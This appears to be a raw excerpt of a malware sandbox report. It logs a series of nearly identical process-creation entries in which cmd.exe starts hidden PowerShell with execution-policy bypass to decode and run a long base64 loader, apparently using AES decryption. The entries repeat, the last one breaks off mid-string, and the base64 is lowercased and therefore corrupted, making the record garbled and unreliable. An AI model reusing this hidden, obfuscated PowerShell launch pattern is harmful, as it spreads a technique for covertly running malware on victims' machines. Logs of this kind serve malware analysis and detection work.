1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2pttw92sxb3mgpxduzpbdh4vfevut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblbxvydsgkcgfyyw1fdmfykxsjsuvyicckdwtjyws9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckb2nraxk9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkdwdzzd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr1a2nhaywgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzhvnc2quq29wevrvkcrvy2tpesk7csrkdwdzzc5eaxnwb3nlkck7csr1a2nhay5eaxnwb3nlkck7csrvy2tpes5eaxnwb3nlkck7csrvy2tpes5ub0fycmf5kck7fwz1bmn0aw9uigluzmrlkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr0zhfzcd1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjg5hexjxpsr0zhfzcc5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyruyxlycs5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jhntaca9icrlbny6vvnfuk5btuu7jhzhbhhrid0gj0m6xfvzzxjzxccgkyakc21oicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakdmfsegs7jg5zynr1pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbib0ym54zigkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnovz1sk54t3dddth6b1jru2pyvi9xl2xobzvar05quw02sez6mxvoazrwut0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygny2